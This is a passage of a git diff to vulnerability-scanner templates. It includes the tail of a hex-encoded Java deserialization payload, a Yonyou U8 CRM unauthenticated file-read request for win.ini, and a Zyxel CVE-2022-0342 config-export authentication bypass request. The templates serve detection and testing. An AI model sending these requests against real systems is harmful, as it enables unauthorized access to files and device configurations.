70059010700030700030700030700DC0700C100010700CDFB004DF9000106F8000506FF000200070005010700DA0700320700380100010700D804FF000200070005010700DA07003207003801000005FF00020002000500010700D8040002000D00000002000E000B0000000A000100020010000A00097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000078707371007E00003F4000000000000077080000001000000000787871007E000678')}} - - stop-at-first-match: true matchers: - type: dsl dsl: - 'status_code_1 == 200 && contains(header_1,"X-T0ken") && contains(header_1,"MTc5Njc2NTUwNg==")' - 'status_code_2 == 200 && contains(header_2,"X-T0ken") && contains(header_2,"MTc5Njc2NTUwNQ==")' - condition: or - - - -# 利用直接改头部 \ No newline at end of file + condition: or \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml deleted file mode 100644 index 08ac1655b3..0000000000 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: yonyou-u8-crm-getemaildata-file-read - -info: - name: 用友U8-CRM getemaildata 任意文件读取 - author: SleepingBag945 - severity: high - description: | - 用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件读取漏洞 - metadata: - tags: yonyou - -http: - - raw: - - | - POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - matchers: - - type: dsl - dsl: - - status_code_1 == 200 && contains(body_1,"for 16-bit app support") - condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml new file mode 100644 index 0000000000..00c3279c2a --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml @@ -0,0 +1,29 @@ +id: yonyou-u8-crm-lfi + +info: + name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: body="用友U8CRM" + verified: true + tags: yonyou,u8-crm,lfi + +http: + - raw: + - | + POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1,"bit app support") && contains(body_1,"extensions") && contains(body_1,"fonts")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/zyxel/CVE-2022-0342.yaml b/http/vulnerabilities/zyxel/CVE-2022-0342.yaml deleted file mode 100644 index eed1c60166..0000000000 --- a/http/vulnerabilities/zyxel/CVE-2022-0342.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-0342 - -info: - name: CVE-2022-0342 Zyxel Authentication Bypass - author: SleepingBag945 - severity: critical - description: Zyxel USG/ZyWALL是中国合勤科技(Zyxel)公司的一款防火墙。ZyWALL 4.20版本至4.70版本、USG FLEX 4.50版本至5.20版本、ATP 4.32版本至5.20版本、VPN 4.30版本至5.20版本、NSG 1.20版本至1.33 Patch 4版本存在安全漏洞,攻击者利用该漏洞绕过Web身份验证并获得设备的管理访问权限。 - tags: zyxel - - -http: - - raw: - - | - GET /cgi-bin/export-cgi?category=config&arg0=startup-config.conf HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip, deflate - Connection: close - - - - - - matchers-condition: and - matchers: - - type: word - words: - - "interface-name" - condition: and - - - type: word - words: - - "text/zyxel" - part: header - condition: and - - - type: status - status: - - 200 - -# https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/ \ No newline at end of file